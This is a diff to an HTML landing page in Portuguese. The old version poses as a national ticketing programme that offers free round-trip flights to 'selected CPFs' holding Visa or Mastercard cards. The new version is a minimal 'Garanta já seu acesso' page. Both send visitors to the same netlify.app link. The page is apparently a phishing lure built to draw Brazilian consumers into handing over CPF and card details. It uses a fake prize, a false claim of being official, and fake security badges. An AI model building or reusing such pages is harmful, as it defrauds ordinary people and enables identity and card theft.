--- a/index.html
+++ b/index.html
@@ -3,68 +3,30 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Verificador de Benefícios - Consulta Nacional</title>
+    <title>Acesso Confirmado</title>
     <style>
-        body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background-color: #f0f2f5; margin: 0; padding: 0; color: #333; }
-        header { background-color: #ffffff; padding: 15px; text-align: center; border-bottom: 2px solid #1a73e8; }
-        .logo { font-weight: bold; color: #1a73e8; font-size: 22px; }
-        .container { max-width: 550px; margin: 30px auto; background: white; padding: 30px; border-radius: 15px; box-shadow: 0 10px 25px rgba(0,0,0,0.1); text-align: center; }
-        h1 { color: #1c1e21; font-size: 24px; line-height: 1.3; margin-bottom: 15px; }
-        .alert-box { background: #fff9e6; border: 1px solid #ffeeba; color: #856404; padding: 15px; border-radius: 8px; font-weight: bold; margin-bottom: 20px; font-size: 15px; }
-        .card-flags { display: flex; justify-content: center; align-items: center; gap: 20px; margin: 20px 0; padding: 10px; border-top: 1px solid #eee; border-bottom: 1px solid #eee; }
-        .flag { font-weight: 800; font-style: italic; font-size: 20px; }
-        .visa { color: #1a1f71; } /* Azul Visa */
-        .master { color: #eb001b; } /* Vermelho Mastercard */
-        .highlight-list { text-align: left; display: inline-block; margin: 15px 0; }
-        .highlight-list div { margin: 8px 0; font-size: 16px; display: flex; align-items: center; }
-        .check-icon { color: #28a745; margin-right: 10px; font-weight: bold; }
-        .cta-button { display: block; background-color: #007bff; color: white; padding: 20px; font-size: 18px; font-weight: bold; text-decoration: none; border-radius: 10px; transition: transform 0.2s; margin-top: 25px; box-shadow: 0 4px 15px rgba(0,123,255,0.3); }
-        .cta-button:hover { transform: scale(1.02); background-color: #0056b3; }
-        footer { margin-top: 40px; padding: 20px; text-align: center; font-size: 11px; color: #777; line-height: 1.5; }
-        .footer-links a { color: #777; text-decoration: none; margin: 0 8px; border-bottom: 1px solid #ccc; }
+        body { font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif; background-color: #ffffff; color: #333; display: flex; align-items: center; justify-content: center; height: 100vh; margin: 0; }
+        .wrapper { text-align: center; max-width: 350px; width: 90%; padding: 20px; }
+        .icon { font-size: 50px; margin-bottom: 20px; }
+        h1 { font-size: 24px; font-weight: 700; margin-bottom: 15px; letter-spacing: -0.5px; }
+        p { font-size: 16px; color: #666; margin-bottom: 30px; line-height: 1.4; }
+        .btn { display: block; background: #000000; color: #ffffff; text-decoration: none; padding: 20px; border-radius: 12px; font-weight: 600; font-size: 18px; transition: all 0.2s ease; }
+        .btn:hover { opacity: 0.8; transform: translateY(-2px); }
+        .footer { position: absolute; bottom: 30px; font-size: 11px; color: #999; text-transform: uppercase; letter-spacing: 1px; }
     </style>
 </head>
 <body>
 
-<header>
-    <div class="logo">✈️ SISTEMA DE BILHETAGEM NACIONAL</div>
-</header>
+<div class="wrapper">
+    <div class="icon">✨</div>
+    <h1>Garanta já seu acesso</h1>
+    <p>Clique no botão abaixo para prosseguir e verificar sua disponibilidade agora.</p>
 
-<div class="container">
-    <div class="alert-box">
-        ⚠️ NOTIFICAÇÃO: Você possui uma premiação pendente de resgate.
-    </div>
-
-    <h1>Resgate sua Passagem de Ida e Volta</h1>
-    
-    <p>O Programa Nacional de Fidelidade liberou a emissão de passagens para CPFs selecionados com base no uso do cartão de crédito.</p>
-
-    <div style="font-weight: bold; color: #444; margin-top: 20px;">VÁLIDO PARA TODAS AS BANDEIRAS:</div>
-    <div class="card-flags">
-        <span class="flag visa">VISA</span>
-        <span style="color: #ddd;">|</span>
-        <span class="flag master">mastercard</span>
-    </div>
-
-    <div class="highlight-list">
-        <div><span class="check-icon">✓</span> Pontos creditados com sucesso</div>
-        <div><span class="check-icon">✓</span> Válido para qualquer trecho no Brasil</div>
-        <div><span class="check-icon">✓</span> Emissão imediata (Ida e Volta)</div>
-    </div>
-
-    <a href="https://inquisitive-vacherin-7c8836.netlify.app/" class="cta-button">CONSULTAR CPF E RESGATAR</a>
-
-    <p style="font-size: 12px; color: #999; margin-top: 15px;">🔒 Consulta segura e oficial via protocolo SSL.</p>
+    <a href="https://inquisitive-vacherin-7c8836.netlify.app/" class="btn">GARANTIR MEU ACESSO</a>
 </div>
 
-<footer>
-    <div class="footer-links">
-        <a href="#">Privacidade</a>
-        <a href="#">Termos de Uso</a>
-        <a href="#">Suporte</a>
-    </div>
-    <p>© 2026 Portal de Benefícios ao Consumidor Brasileiro.<br>
-    Este site é uma página informativa de pré-consulta. Os serviços de emissão são processados no portal oficial de destino. Todas as bandeiras Visa e Mastercard são elegíveis para a verificação de pontuação acumulada.</p>
+<footer class="footer">
+    Ambiente Seguro • 2026
 </footer>
 
 </body>
